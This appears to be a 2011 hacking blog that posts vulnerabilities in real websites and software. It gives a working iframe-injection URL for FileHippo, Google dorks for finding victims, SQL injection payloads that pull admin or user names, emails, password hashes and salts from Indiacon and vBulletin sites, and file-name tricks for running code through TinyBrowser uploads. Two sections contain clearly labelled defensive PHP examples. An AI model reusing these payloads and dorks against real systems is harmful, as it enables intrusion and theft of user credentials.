Thursday, 28. July 2011
FileHippo - Iframe Injection
Popular Freeware Software download website "FileHippo" is Vulnerable to Iframe Injection.

Vulnerable Link
http://www.filehippo.com/search?q=%22%3E%3Ciframe%20src=http://www.google.com%20height=500%20width=500%3E

by n3t phir3


Tuesday, 26. July 2011
ICQ 7.5 Client - remote client hijacking
Source
ICQ 7.5 client
http://noptrix.net/advisories/icq_cli_xss.txt
icq.com webpage
http://noptrix.net/advisories/icq_web_xss.txt

by Kayan


Friday, 22. July 2011
Indiacon selloffers.php - SQL
Dork : inurl:selloffers.php?cid= "Powered by indiacon.com"

Exploit:
www.victim.com/selloffers.php?cid=9/**/union/**/select/**/1,concat(sb_admin_name,0x3a,sb_pwd),3,4,5,6,7,8/**/from/**/auto_admin

by
Ehsan_Hp200


Thursday, 21. July 2011
Vbulletin 4.0.x => 4.1.3 - SQL
Google Dork: intitle: powered by Vbulletin 4

Vulnerable Code:
File: /vbforum/search/type/socialgroupmessage.php
Line No: 388
Parameter : messagegroupid
Source
http://pastebin.com/0L6tCjM3

Exploitation:
Post data on: -->search.php?search_type=1
--> Search Single Content Type
Keywords : Valid Group Message
Search Type : Group Messages
Search in Group : Valid Group Id

&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

by FB1H2S


Tuesday, 19. July 2011
WP e-Commerce <= 3.8.4 - SQL
Download link:
http://wordpress.org/extend/plugins/wp-e-commerce
Google Dork:
inurl:page_id= "Your billing/contact details"

Bugged code (wpsc-theme/functions/wpsc-user_log_functions.php):
foreach ( (array)$_POST['collected_data'] as $value_id => $value ) {
    // $value_id is taken straight from POST and interpolated into the query unescaped
    $form_sql = "SELECT * FROM `" . WPSC_TABLE_CHECKOUT_FORMS . "` WHERE `id` = '$value_id' LIMIT 1";
    $form_data = $wpdb->get_row( $form_sql, ARRAY_A );
}

FIX:
Upgrade to new version

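As an added example (not the plugin's own code and not part of the advisory above), here is the same lookup written the way WordPress code is expected to bind untrusted input: the array key is checked to be a plain integer and then bound with $wpdb->prepare() and a %d placeholder, so it can never alter the SQL structure. $wpdb, ARRAY_A and WPSC_TABLE_CHECKOUT_FORMS are the WordPress/plugin names from the post; the function name and its return shape are illustrative.

```php
<?php
// Added example, not WP e-Commerce code. Assumes it runs inside WordPress,
// where $wpdb, ARRAY_A and the plugin constant WPSC_TABLE_CHECKOUT_FORMS exist.

/**
 * Hardened version of the loop from the advisory.
 * Returns an array of form rows keyed by the validated form id; client-supplied
 * keys that are not plain integers, or that match no row, are skipped.
 */
function wpsc_example_collect_form_rows( array $collected_data ): array {
    global $wpdb;
    $rows = array();

    foreach ( $collected_data as $value_id => $value ) {
        // Reject anything that is not a non-negative decimal integer. This alone
        // stops quote-based injection, but we still bind the value below.
        if ( ! ctype_digit( (string) $value_id ) ) {
            continue;
        }
        $id = (int) $value_id;

        // %d makes $wpdb->prepare() emit an integer literal; the table name is a
        // trusted constant, so concatenating it is fine.
        $form_sql = $wpdb->prepare(
            'SELECT * FROM `' . WPSC_TABLE_CHECKOUT_FORMS . '` WHERE `id` = %d LIMIT 1',
            $id
        );
        $form_data = $wpdb->get_row( $form_sql, ARRAY_A );

        if ( null === $form_data ) {
            continue; // unknown id: do not trust the client's guess
        }
        $rows[ $id ] = $form_data;
    }

    return $rows;
}

// Typical call site, replacing the direct use of $_POST in the advisory:
// $rows = wpsc_example_collect_form_rows( isset( $_POST['collected_data'] ) ? (array) $_POST['collected_data'] : array() );
```

The ctype_digit() gate is deliberately redundant with the %d binding: the binding is what prevents injection, and the gate keeps obviously malformed keys out of the database round trip and the later code path that consumes $rows.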

Monday, 18. July 2011
TinyBrowser - Code Execution
-------------------------
Affected products:
-------------------------

Vulnerable are TinyBrowser v1.42 and previous versions (and all web
applications which are using it, such as TinyMCE). The developer fixed these
holes in the next version, 1.43, already in February, after my report, but
this version still has not been released. So contact the developer for the new version.

----------
Details:
----------

Code Execution (WASC-31):

Execution of arbitrary code is possible due to a bypass of the program's security
filters (on the IIS and Apache web servers).

Code executes via file upload. The program is vulnerable to three methods
of code execution:

1. Via the ";" symbol in the file name (1.asp;.txt) (IIS).

2. Via "1.asp" in the folder name (IIS).

3. Via a double extension (1.php.txt) (Apache with a special configuration).


by
MustLive

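As an added example (not TinyBrowser's code and not part of the advisory), an allowlist check for uploaded file and folder names that rejects all three of the patterns listed above by construction: a file name must be exactly "base.ext" with the extension on an allowlist, and a folder name may contain no dot at all. The function names, the character set and the sample names are assumptions chosen for the illustration.

```php
<?php
// Added example, not TinyBrowser code: allowlist validation of upload names.

/**
 * Returns a normalised "base.ext" name, or null if the name is not acceptable.
 * "1.asp;.txt" and "1.php.txt" both contain two dots and are rejected before the
 * extension is even looked at; "1.asp" is rejected because "asp" is not allowed.
 */
function safe_upload_name( string $original, array $allowed_ext ): ?string {
    // Strip any directory part the client sent along (both separator styles).
    $name  = basename( str_replace( '\\', '/', $original ) );
    $parts = explode( '.', $name );
    if ( count( $parts ) !== 2 ) {
        return null;                       // zero or several extensions
    }
    list( $base, $ext ) = $parts;
    $ext = strtolower( $ext );
    if ( ! in_array( $ext, $allowed_ext, true ) ) {
        return null;                       // extension not on the allowlist
    }
    // The base is restricted to a conservative set, so ";" and other
    // server-significant characters can never appear in the stored name.
    if ( ! preg_match( '/^[A-Za-z0-9_-]{1,100}$/', $base ) ) {
        return null;
    }
    return $base . '.' . $ext;
}

/**
 * Folder names get the same character set and no extension at all,
 * so a folder called "1.asp" is refused.
 */
function safe_folder_name( string $folder ): ?string {
    return preg_match( '/^[A-Za-z0-9_-]{1,64}$/', $folder ) ? $folder : null;
}

// Constructed sample inputs covering the three advisory cases plus benign names.
$allowed = array( 'jpg', 'png', 'gif', 'pdf', 'txt' );
$file_cases = array(
    '1.asp;.txt'  => null,            // case 1: ";" trick, two dots
    '1.php.txt'   => null,            // case 3: double extension
    '1.asp'       => null,            // executable extension, not allowed
    'Report.PDF'  => 'Report.pdf',    // benign, extension normalised
    'photo;.jpg'  => null,            // ";" in base is refused outright
    '../x.png'    => 'x.png',         // path component stripped
);
foreach ( $file_cases as $input => $expected ) {
    $got = safe_upload_name( $input, $allowed );
    assert( $got === $expected );
    printf( "%-12s -> %s\n", $input, $got === null ? 'REJECT' : $got );
}
assert( safe_folder_name( '1.asp' ) === null );      // case 2
assert( safe_folder_name( 'user_42' ) === 'user_42' );
```

The check is intentionally stricter than a blocklist of dangerous extensions: on the IIS and Apache configurations the advisory names, the server decides how to handle a file from the parts of the name that a blocklist does not look at, so the safe rule is to accept only names whose whole shape is known. It complements, rather than replaces, serving the upload directory with script execution disabled.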

4shared.com, Multiupload, Fileserve, Speedyshare..... – XSS
4shared.com does not filter their filename input which allows us to inject HTML code into the filename variable, being shown on the “Upload success” page. This page is (by going to the page’s URL) viewable for other people as well. I’m not sure how long this page remains visible.

This kind of XSS probably works at a lot more upload services (as proven below)!

Source
http://pastebin.com/Yx8qihha


Generator XSS
Source
http://translate.googleusercontent.com/translate_c?hl=en&rurl=translate.google.com&sl=uk&tl=en&u=http://websecurity.com.ua/xss_generator/&usg=ALkJrhh699gbDJD7X7rSoHNSC4_gIbxn6Q


Friday, 15. July 2011
Armitage 07.12.11
“Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets, recommends exploits, and exposes the advanced capabilities of the framework. Armitage aims to make Metasploit usable for security practitioners who understand hacking but don’t use Metasploit every day. If you want to learn Metasploit and grow into the advanced features, Armitage can help you.”

Download
http://www.fastandeasyhacking.com/download

Metasploit
http://securityxploit.blogger.de/stories/1846661/


Skype - XSS
Skype suffers from a persistent Cross-Site Scripting vulnerability due to a lack
of input validation and output sanitization of the "mobile phone" profile entry.
Other input fields may also be affected.

Source
http://www.noptrix.net/advisories/skype_xss.txt
